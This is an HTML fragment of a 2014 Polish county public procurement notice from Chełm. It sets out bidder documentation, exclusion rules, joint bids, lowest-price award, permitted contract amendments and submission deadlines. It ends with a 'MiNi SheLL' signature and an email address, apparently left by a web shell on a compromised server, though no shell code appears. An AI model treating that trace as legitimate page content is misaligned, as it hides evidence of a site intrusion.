<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Jeżeli Wykonawca, wykazując spełnianie warunków, o których mowa w art. 22 ust. 1 ustawy, polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy, a podmioty te będą brały udział w realizacji części zamówienia, Zamawiający żąda od Wykonawcy przedstawienia w odniesieniu do tych podmiotów dokumentów wykazujących brak podstaw do wykluczenia z postępowania o udzielenie zamówienia. 
Dopuszcza się możliwość złożenia oferty wspólnej przez dwóch lub więcej wykonawców w rozumieniu art. 23 ustawy. W przypadku złożenia oferty wspólnej każdy z wykonawców musi oddzielnie udokumentować spełnienie wymagań określonych w art. 22 ust. 1 pkt 1 oraz w art. 24 ustawy. Wymagania określone w art. 22 ust. 1 pkt 2, 3 i 4 ustawy Wykonawcy mogą spełniać wspólnie. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Dokumenty należy złożyć w formie oryginału lub kopi poświadczonej za zgodność z oryginałem przez Wykonawcę bądź upoważnionego przedstawiciela Wykonawcy, zgodnie z treścią dokumentu określającego status Wykonawcy bądź treścią załączonego do oferty pełnomocnictwa.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje zmiany istotnych postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy. Zamawiający dopuszcza możliwość zmiany ustaleń zawartej umowy w stosunku do treści oferty w zakresie:
1)terminu realizacji umowy gdy jest ona spowodowana:
a)warunkami atmosferycznymi uniemożliwiającymi wykonywanie robót w stosunku do których prowadzony jest nadzór (przez warunki atmosferyczne uniemożliwiające wykonywanie robót należy rozumieć warunki atmosferyczne w znaczny sposób odbiegające od warunków zwykle panujących o tej samej porze roku na terenie realizowania robót,
b)epidemią stwierdzoną przez uprawnione do tego organy,
c)siłą wyższą, 
d)wadami dokumentacji projektowej uniemożliwiającymi prawidłowe wykonanie przedmiotu umowy na roboty budowlane stanowiące przedmiot nadzoru zgodnie z zasadami sztuki budowlanej i skutkującymi przerwą w realizacji robót budowlanych.
2)zmiany osób przewidzianych do realizacji zamówienia przez strony w przypadku zdarzeń takich jak: śmierć, choroba, ustanie stosunku pracy, zmiana zakresu obowiązków pod warunkiem, że zaproponowane osoby będą miały kwalifikacje nie niższe od osób wskazanych w umowie.
Zmiany umowy wymagają zgody Zamawiającego i Wykonawcy w formie sporządzonego na piśmie i podpisanego przez strony aneksu. Poza przypadkami wymienionymi wyżej Zamawiający nie przewiduje zmiany innych istotnych postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.powiat.chelm.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Chełmie, Plac Niepodległości 1, 22-100 Chełm, parter, pokój Nr 25.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.05.2014 godzina 10:00, miejsce: Starostwo Powiatowe w Chełmie, Plac Niepodległości 1, 22-100 Chełm, I piętro, pokój Nr 127.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> -.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com